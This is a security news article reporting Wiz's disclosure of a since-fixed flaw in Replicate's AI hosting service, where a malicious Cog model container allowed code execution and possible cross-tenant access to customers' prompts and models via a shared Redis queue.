Experts Discover a Defect in the Replicate AI Service That Exposes Customers’ Data and Models

Cybersecurity researchers have discovered a critical security vulnerability in Replicate, a company that offers artificial intelligence (AI) as a service. This vulnerability could have given threat actors access to private AI models and private data.

Cloud Security Company Wiz stated in a study released this week that “exploitation of this vulnerability would have allowed unauthorized access to the AI prompts and results of all Replicate’s platform customers.”

The problem arises from the fact that AI models are commonly packed in forms that permit arbitrary code execution. This means that a malicious model could be used by an attacker to carry out cross-tenant assaults.

Machine learning models are containerized and packaged by Replicate using an open-source technology called Cog. These models can then be deployed in a self-hosted environment or through Replicate.

According to Wiz, it made a malicious Cog container and submitted it to Replicate, using it in the end to accomplish elevated privilege remote code execution on the infrastructure of the service.

Security experts Shir Tamari and Sagi Tzadik stated, “We suspect this code-execution technique is a pattern, where companies and organizations run AI models from untrusted sources, even though these models are code that could potentially be malicious.”

The company’s assault method then used an already-established TCP connection to inject arbitrary commands into a Redis server instance running on the Kubernetes cluster housed on the Google Cloud Platform.

Furthermore, by manipulating the process to include rogue jobs that could affect the outcomes of other customers’ models, the centralized Redis server—which serves as a queue to handle several customer requests and their responses—could be misused to enable cross-tenant attacks.

These rogue alterations pose serious threats to the accuracy and dependability of AI-driven outputs in addition to endangering the integrity of the AI models.

“An attacker could have queried the private AI models of customers, potentially exposing proprietary knowledge or sensitive data involved in the model training process,” the researchers said. “Additionally, intercepting prompts could have exposed sensitive data, including personally identifiable information (PII).

Replicate has subsequently resolved the issue, which was duly revealed in January 2024. There’s no proof that the flaw was used to compromise client data in the wild.

The revelation was made just over a month after Wiz revealed vulnerabilities in Hugging Face and other platforms that have since been patched that could enable threat actors to take control of the continuous integration and continuous deployment (CI/CD) pipelines, escalate privileges, and obtain cross-tenant access to the models of other customers.

“Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers because attackers may leverage these models to perform cross-tenant attacks,” the study’s authors wrote.

“The potential impact is devastating, as attackers may be able to access the millions of private AI models and apps stored within AI-as-a-service providers.”

Found this article interesting? Follow us on YouTube and Instagram to read more exclusive content we post.

Leave a Reply

Your email address will not be published. Required fields are marked *